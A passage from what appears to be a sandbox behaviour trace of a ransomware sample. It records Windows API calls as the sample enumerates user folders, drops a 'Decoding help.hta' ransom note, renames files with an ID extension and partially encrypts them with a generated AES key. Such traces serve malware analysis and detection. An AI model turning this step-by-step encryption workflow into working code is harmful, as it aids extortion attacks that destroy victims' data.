nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8990 [0042.063] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.063] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0x688fd30 | out: lpFindFileData=0x688fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.063] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.063] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.063] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0x688fd30 | out: lpFindFileData=0x688fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0042.064] FindClose (in: hFindFile=0x5d8990 | out: hFindFile=0x5d8990) returned 1 Thread: id = 192 os_tid = 0x874 [0040.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\*.*", lpFindFileData=0x6b0fd30 | out: lpFindFileData=0x6b0fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5d30 [0040.421] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.421] FindNextFileW (in: hFindFile=0x5a5d30, lpFindFileData=0x6b0fd30 | out: lpFindFileData=0x6b0fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.421] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.421] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.421] FindNextFileW (in: hFindFile=0x5a5d30, lpFindFileData=0x6b0fd30 | out: lpFindFileData=0x6b0fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.421] lstrcpyW (in: lpString1=0x983a6a8, lpString2="\\\\?\\C:\\Users\\Default\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\Default\\Desktop\\*.*" [0040.421] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Desktop\\*.*") returned 32 [0040.421] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Desktop\\Decoding help.hta" [0040.421] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\default\\desktop\\decoding help.hta")) returned 0xffffffff [0040.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\default\\desktop\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.489] WriteFile (in: hFile=0x1b8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x6b0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x6b0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.490] CloseHandle (hObject=0x1b8) returned 1 [0041.490] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.490] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0041.490] lstrlenW (lpString="desktop.ini") returned 11 [0041.490] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\Default\\Desktop\\*.*" [0041.490] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Desktop\\*.*") returned 32 [0041.490] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" [0041.490] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" [0041.490] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0041.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\desktop\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\desktop\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0042.076] CreateFileMappingA (hFile=0x384, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x524 [0042.076] CryptAcquireContextA (in: phProv=0x6b0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6b0fcec*=0x5e9cc38) returned 1 [0047.365] CryptGenKey (in: hProv=0x5e9cc38, Algid=0x6610, dwFlags=0x1, phKey=0x6b0fce8 | out: phKey=0x6b0fce8*=0x5d89d0) returned 1 [0047.365] CryptExportKey (in: hKey=0x5d89d0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x6b0fbe4, pdwDataLen=0x6b0fce4 | out: pbData=0x6b0fbe4*, pdwDataLen=0x6b0fce4*=0x2c) returned 1 [0047.365] MapViewOfFile (hFileMappingObject=0x524, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100) returned 0x550000 [0047.367] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b0fbe4*, pdwDataLen=0x6b0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x6b0fbe4*, pdwDataLen=0x6b0fcf8*=0x100) returned 1 [0047.367] CryptEncrypt (in: hKey=0x5d89d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000*, pdwDataLen=0x6b0fce4*=0x100, dwBufLen=0x100 | out: pbData=0x550000*, pdwDataLen=0x6b0fce4*=0x100) returned 1 [0047.367] UnmapViewOfFile (lpBaseAddress=0x550000) returned 1 [0047.369] CloseHandle (hObject=0x524) returned 1 [0047.369] CryptDestroyKey (hKey=0x5d89d0) returned 1 [0047.369] CryptReleaseContext (hProv=0x5e9cc38, dwFlags=0x0) returned 1 [0047.369] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.369] WriteFile (in: hFile=0x384, lpBuffer=0x6b0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x6b0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x6b0fbe4*, lpNumberOfBytesWritten=0x6b0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0047.791] WriteFile (in: hFile=0x384, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x6b0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x6b0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0047.791] CloseHandle (hObject=0x384) returned 1 [0047.792] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0050.372] FindNextFileW (in: hFindFile=0x5a5d30, lpFindFileData=0x6b0fd30 | out: lpFindFileData=0x6b0fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0050.373] FindClose (in: hFindFile=0x5a5d30 | out: hFindFile=0x5a5d30) returned 1 Thread: id = 193 os_tid = 0x870 [0040.422] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*", lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5d70 [0040.422] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.422] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.423] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.423] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.423] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="42D5BEC7DDFBD49E76467529CBC2868987BF8460", cAlternateFileName="42D5BE~1")) returned 1 [0040.423] lstrcmpW (lpString1=".", lpString2="42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned -1 [0040.423] lstrcmpW (lpString1="..", lpString2="42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned -1 [0040.423] lstrcmpiW (lpString1="windows", lpString2="42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned 1 [0040.423] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0040.423] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0040.423] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="42D5BEC7DDFBD49E76467529CBC2868987BF8460" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460" [0040.423] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*" [0040.423] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0040.423] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x98426b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0040.424] CloseHandle (hObject=0x2a0) returned 1 [0040.424] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", cAlternateFileName="54050A~1")) returned 1 [0040.424] lstrcmpW (lpString1=".", lpString2="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned -1 [0040.424] lstrcmpW (lpString1="..", lpString2="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned -1 [0040.424] lstrcmpiW (lpString1="windows", lpString2="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned 1 [0040.424] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0040.424] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0040.424] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" [0040.424] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*" [0040.424] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0040.424] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x985a718, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0040.425] CloseHandle (hObject=0x2a0) returned 1 [0040.425] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", cAlternateFileName="{13A4E~1.210")) returned 1 [0040.425] lstrcmpW (lpString1=".", lpString2="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned -1 [0040.425] lstrcmpW (lpString1="..", lpString2="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned -1 [0040.425] lstrcmpiW (lpString1="windows", lpString2="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned 1 [0040.425] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0040.425] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0040.425] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0040.425] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*" [0040.425] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0040.426] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9872780, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0040.426] CloseHandle (hObject=0x2a0) returned 1 [0040.426] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xecd314a0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", cAlternateFileName="{33D1F~1")) returned 1 [0040.426] lstrcmpW (lpString1=".", lpString2="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned -1 [0040.427] lstrcmpW (lpString1="..", lpString2="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned -1 [0040.427] lstrcmpiW (lpString1="windows", lpString2="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 1 [0040.427] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0040.427] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0040.427] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0040.427] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" [0040.427] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0040.427] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x988a7e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0040.428] CloseHandle (hObject=0x2a0) returned 1 [0040.428] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", cAlternateFileName="{37B8F~1.610")) returned 1 [0040.428] lstrcmpW (lpString1=".", lpString2="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned -1 [0040.428] lstrcmpW (lpString1="..", lpString2="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned -1 [0040.428] lstrcmpiW (lpString1="windows", lpString2="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned 1 [0040.430] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0040.430] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0040.430] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" [0040.430] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*" [0040.430] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0040.431] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e66fd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0040.431] CloseHandle (hObject=0x2a0) returned 1 [0040.431] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a127460, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", cAlternateFileName="{3C3AA~1")) returned 1 [0040.432] lstrcmpW (lpString1=".", lpString2="{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned -1 [0040.432] lstrcmpW (lpString1="..", lpString2="{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned -1 [0040.432] lstrcmpiW (lpString1="windows", lpString2="{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned 1 [0040.433] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0040.434] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0040.434] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{3c3aafc8-d898-43ec-998f-965ffdae065a}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" [0040.434] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*" [0040.434] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0040.434] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e7f038, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0040.434] CloseHandle (hObject=0x2a0) returned 1 [0040.435] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 